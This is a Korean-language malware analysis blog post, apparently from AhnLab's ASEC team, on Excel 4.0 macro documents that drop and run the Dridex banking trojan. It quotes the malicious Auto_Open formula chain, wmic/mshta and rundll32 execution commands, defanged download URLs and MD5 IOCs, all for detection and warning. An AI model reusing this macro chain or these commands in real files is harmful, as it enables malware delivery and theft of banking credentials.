Excel 4.0 매크로를 통해 유포되는 Dridex

최근 ASEC 분석팀은 엑셀 문서를 통해 Dridex 가 유포되는 방식이 빠른 주기로 변화되고 있는 것을 확인하였다. 작년부터 Dridex 유포 방식에 대해 ASEC 블로그를 통해 소개 해왔으며, 지난달 작업 스케줄러를 이용하여 Dridex 를 유포하는 엑셀 문서를 마지막으로 소개하였다. 현재 유포 중인 엑셀 문서에서는 이전과 달리 VBA 매크로가 사용되지 않았으며, Excel 4.0 매크로만 사용되고 있다. 이러한 변화는 백신 탐지를 우회하기 위한 것으로 추정되며 변화 주기가 짧아지고 있다.

최근 유포되고 있는 엑셀 문서의 실행 화면은 아래와 같다. 다양한 이미지를 이용하여 사용자가 매크로 사용 버튼을 클릭하도록 유도하고 있다.

악성 행위에 사용되는 매크로는 기존에 사용되던 VBA 매크로가 아닌, Excel 4.0 매크로가 사용되었다. 매크로 실행시 숨겨진 시트에 존재하는 Auto_Open 을 통해 해당 셀에 있는 수식이 자동으로 실행되어 악성 행위를 수행한다.

Auto_Open 을 통해 아래의 순서대로 악성 수식 매크로가 실행되며 악성 파일 생성 및 실행의 기능을 수행한다.

• 악성 수식 매크로
  =FOPEN(GET.NOTE(Macro1!$A$3, 1, 200), 1+2)
  =FOR.CELL(“HdOrvNpzIeLysqA”,D160:AR521, TRUE)
  =FWRITE(B152,CHAR(HdOrvNpzIeLysqA))
  =NEXT()
  =FCLOSE(B152)
  =EXEC(GET.NOTE(Macro1!$A$4, 1, 200))

이때 사용되는 악성 데이터는 셀에 분산되어 있으며, 셀의 메모 기능을 함께 이용한다. 해당 메모는 숨기기 기능이 사용되어 엑셀에 나타나지 않지만, 아래와 같이 메모 표시 기능을 통해 악성 데이터를 확인할 수 있다. 메모에 저장된 데이터는 파일이 생성되는 경로와 해당 파일을 실행하는 명령어이며, 생성되는 파일의 데이터는 특정셀 (D160:AR521) 에 10진수로 저장되어 있다.

생성된 악성 파일은 ProgramData 폴더에 sct 확장자로 저장되어 wmic 명령어를 통해 실행된다.

• 파일 생성 경로
  C:\ProgramData\fCLjKsEAHjoxErF.sct

• 파일 실행 명령어
  wmic process call create ‘mshta C:\ProgramData\fCLjKsEAHjoxErF.sct’

생성된 sct 파일의 일부 코드는 아래와 같으며 많은 주석으로 난독화된 형태이다. sct 파일 실행시, ProgramData 폴더에 sct 확장자의 파일을 추가로 생성한다. 추가로 생성되는 sct 파일은 이후에 생성되는 dll 파일을 실행하는 기능을 수행한다.  

이후 5개의 url 에 접속을 시도하여 악성 파일을 다운로드하며 ProgramData 폴더에 dll 확장자로 저장된다. 다운로드되는 dll 은 Dridex 악성코드로 확인되었다.

• 다운로드 url
  hxxp://coldchallenge[.]xyz:8080/js/filler_dk9naf.png
  hxxp://updateviacloud[.]xyz:8080/files/filler_dk9naf.png
  hxxp://updateviacloud[.]xyz:8080/wp-heme/filler_dk9naf.png
  hxxp://updateviacloud[.]xyz:8080/js/filler_dk9naf.png
  hxxps://space.egematey[.]com/wp-content/cache/wpfc-mobile-cache/proclus-the-quaestor/amp/j4a42p0W.php

Dridex 악성코드를 다운로드 후 추가로 생성되었던 sct 파일을 실행한다.

추가로 생성된 sct 파일의 일부 코드는 아래와 같다. 실행시 wmic 를 통해 다운로드된 Dridex 악성코드를 실행하는 기능을 수행하며, 명령어는 아래와 같다.

• 파일 실행 명령어
  wmic process call create “rundll32.exe C:\\ProgramData\ljneLUpdLaTjomtIyXuy.dll GetDesktopDPI”

Dridex 는 뱅킹 악성코드로 뱅킹 관련 사용자 정보를 수집하며, 로더를 거쳐 메인 모듈을 다운로드 받아 추가 악성 행위를 수행할 수 있다. 과거 해당 악성코드를 통해 DopplePaymer, BitPaymer, CLOP 랜섬웨어 등이 유포된 이력이 존재한다. 또한 Dridex 를 유포하는 엑셀 문서의 변형이 다양한 형태로 지속적으로 발생하고 있으며, 악성 매크로가 포함된 엑셀 파일은 주로 스팸 메일을 통해 유포되고 있어 출처가 불분명한 파일의 실행을 자제해야하며 사용자의 주의가 필요하다.

[파일 진단]

• Downloader/XLS.Dridex
• Trojan/Win.BankerX-gen.R438509

 [IOC 정보]

• 2e118f4e98e8e41ece2be3a5b94245ba
• c7d07592916c5f79bf0dca4b9fccda50
• f71f826eb4d2700598476026fea1030e
• c4ac79f00a9958a719c850995f860d8d
• ab6b811f95b68076b5e5de338edb0f3c

 [기존 엑셀로 유포된 Dridex 관련 블로그]

더욱 정교해진 Excel 문서 (Dridex, Cobalt Strike 유포) – ASEC BLOG

엑셀 문서를 통해 Dridex 가 유포되는 방식은 작년부터 꾸준히 확인되었으며 ASEC 블로그에도 게시되었다. 최근 ASEC 분석팀은 기존과 비슷한 방식으로 Dridex 와 함께 Cobalt Strike 툴이 함께 유포되는 정황을 포착하였다. 최근 유포되는 엑셀 문서에는 기존과 달리 작업 스케줄러를 이용하여 특정 시간 이후 악성 행위를 수행하는 것으로 확인되었다. 이러한 동작방식의 변화는 샌드박스 환경에서의 탐지 및 행위탐지를 우회하기 위한 시도로 추정된다. 또한, Dridex, Cobalt Strike 악성코드는 과거 도플페이머(…

Dridex 악성코드 다운로드 방식(WMIC 이용 XSL 실행) – ASEC BLOG

지난 6월 ASEC 분석팀은 금융 정보 탈취형 악성코드로 알려진 Dridex의 새로운 유포 방식을 확인하였다. 이번에 확인된 유포 방식([그림 1])은 악성 매크로가 담긴 문서 파일 실행을 시작으로 정상 윈도우 유틸리티(WMIC.exe)을 활용하여 악성 XSL(Extensible Stylesheet Language) 문서 스크립트 파일을 실행하는 방식이다. 결과적으로 감염 PC에는 실행된 XSL 포맷 파일에 의해 Dridex가 실행된다. ※ XSL 포맷은 XML 형식으로 javascript, vbscript 등의 스크립팅을 지원하는…

탐지 우회 방법으로 무장한 Dridex 악성코드 유포방식 분석 – ASEC BLOG

Dridex (또는 Cridex, Bugat)는 대표적인 금융 정보 유출형 악성코드이다. 사이버범죄 조직에 의해 글로벌로 대규모로 유포되고 있으며, 주로 스팸메일에 포함된 Microsoft Office Word나 Excel 문서 파일의 매크로를 이용한다. Dridex 악성코드의 가장 큰 특징으로는 다운로더, 로더, 봇넷 등 기능에 따라 파일을 모듈화하여 동작한다는 점이다. 이로 인해 Dridex 악성코드를 이용하여 DoppelPaymer 나 BitPaymer와 같은 랜섬웨어가 유포된 이력도 확인되었다. Dridex 악성코드를 제작 …

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.